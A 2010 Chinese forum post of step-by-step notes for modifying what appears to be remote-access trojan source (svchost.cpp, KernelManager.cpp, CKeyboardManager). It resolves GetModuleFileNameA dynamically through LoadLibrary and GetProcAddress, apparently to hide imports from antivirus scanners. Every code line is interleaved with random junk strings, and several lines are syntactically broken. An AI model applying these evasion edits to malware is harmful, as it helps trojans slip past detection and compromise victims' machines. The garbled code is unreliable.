标题:
[原创文章]
全局动态调用
[打印本页]
作者:
ice_xke
时间:
2010-10-19 12:30
标题:
全局动态调用
全局动态调用笔记
! h% \$ ^1 X4 L* M* L' \
svchost files工程->插入->类(Generic Class DTDY)->DTDY.cpp DTDY.h
# j8 T$ w, j8 H7 e* J# k5 q4 f
----------------------------------------
0 {1 b0 Y7 v3 R5 x. ~
DTDY.h:
$ g! M3 c# O. E3 T: q
9 e! V$ ^7 Q: }. ?
#if _MSC_VER>1000
( }: v1 W) V. B6 }# A% t
#pragma once
: ?" O! t6 m! v
#endif //_MSC_VER>1000
) z. K; r# Q* h% z9 I& M! y: r' ]
#include<windows.h>
% J! m2 t F( ^$ e( ?
( _9 `4 }) {% U. w* N9 ?" r; {
typedef DWORD (__stdcall *pGetModuleFileNameA)(HMODULE,LPSTR,DWORD);
2 b' Y6 k9 A1 S! U9 C
class DTDY
8 E& W n/ Y) Q, }& \% I+ T
{
6 ^4 K& _' y0 H5 b- l
public:
( |$ b& A. k& ]; _$ P" r
DTDY();
" }+ N P2 o+ S* [1 W' F
virtual ~DTDY();
: [, l$ y& i9 C* ^5 N) r8 n. y- |
public:
: Z# U$ _3 C$ q Q8 a4 }
static pGetModuleFileNameA MyGetModuleFileName;
% Z5 S0 L$ Y; W
static BOOL FunInitiallization();
1 k" a5 m5 u9 g c7 U( q8 U
};
4 S3 Q% K6 h9 Z
#endif
2 ]7 m2 E+ n" z. x
----------------------------------------
" Z3 U( K1 a% H) f" n' U* s
* s \& W+ k" A6 {. E- {* \% J4 @
DTDY.cpp:
( n* u8 l3 P z+ K0 w6 u
% s( w5 h! m( ]6 r1 [
#include "DTDY.h"
' |7 a* q0 z2 X9 J" p# W
pGetModuleFileNameA DTDY::MyGetModuleFileName=NULL;
$ X- O4 N; i" C, H2 @6 X) b
DTDY:TDY()
0 N5 l# a, i h; z7 o( c4 A D9 |
{
7 P4 t: i8 P6 O( F
}
; u: m/ q5 D9 {% W; b& \
DTDY::~DTDY()
% G$ C0 J- K6 O6 q4 t5 x
{
5 p: T: C) o) U7 b
}
, b! K) a' @9 g
BOOL DTDY::FunInitiallization()
+ n( T) h! j/ x% ^% O- D8 M/ @7 F
{
' S+ `$ {5 V% Y$ ~
HMODULE hModule=LoadLibrary("kernel32.dll");
! ?! A) m0 \" Y
MyGetModuleFileName=(pGetModuleFileNameA)GetProcAddress(hModule,"GetModuleFileNameA");
/ G3 ^! ~" p5 i
if(!MyGetModuleFileName=) return FALSE;
/ x; H3 ^% D4 H1 E2 U
: g: T: Q% R+ {
return TRUE;
. K" c) N) h+ @& h$ k
}
$ P/ U1 j4 d1 \# m; J3 i8 J
----------------------------------------
! N" o+ q) `' ~9 s, C) a
svchost.cpp:
: R5 ^& J5 C- I& J7 J* I
4 f2 p! |- \) z% j4 l ?
#include "DTDY.h"
4 g7 u; k) q) _) Q6 O
+ v- |* m- \# c A, `( R
BOOL APIENTRY DllMain(HANDLE hModule,DWORD ul_reason_for_call,LPVOID lpReserved)
5 Q q) _9 m! {: q7 z" R
{
, Z! Y( \7 c9 h3 r! [, T. ]9 Z6 N
switch(ul_reason_for_call)
9 Q" j: e% Y; ]+ X
{
c" I$ a9 ~3 }; z- V
case DLL_PROCESS_ATTACH:
$ y# F( i# F" c- O9 U; M; h
if(!DTDY::FunInitiallization()) return FALSE;
8 n7 f S! G; j* ?; p
b J2 i$ F+ Y/ V
break;
$ @1 A1 k/ {0 E; M
}
7 i' ]0 r: a! m. H; K
}
0 B/ }& R; T- j- N
: Z7 t/ W$ Y6 B( D) q0 I" V$ B
* I+ H! H8 D F! j& q; Z0 \
GetModuleFileName(CKeyboardManager::g_hInstance,strFileName,sizeof(strFileName));->goto def
9 \# O4 Y% Z( ]7 F5 b
改写为
$ s) J) Q+ Z8 H h _
DTDY::MyGetModuleFileName(CKeyboardManager::g_hInstance,strFileName,sizeof(strFileName));
" ]% ]" n) B; @! T9 l
----------------------------------------
' t3 D# }* L {- R8 j
KernelManager.cpp:
6 O7 o( I/ U2 a9 S
0 {0 f0 c2 d( r$ P4 r
#include "../DTDY.h"
6 ^: F5 f- q& n9 i! \/ }5 Q) W
GetModuleFileName(CKeyboardManager::g_hInstance,strServiceDll,sizeof(strServiceDll));
% Y: t( R8 G# Z! G
改写为
5 u: E2 j: I/ F8 L5 a+ X( ]
DTDY::MyGetModuleFileName(CKeyboardManager::g_hInstance,strServiceDll,sizeof(strServiceDll));
* y" K5 ~. Q! j
----------------------------------------
欢迎光临 【3.A.S.T】网络安全爱好者 (http://3ast.com/)
Powered by Discuz! 7.2
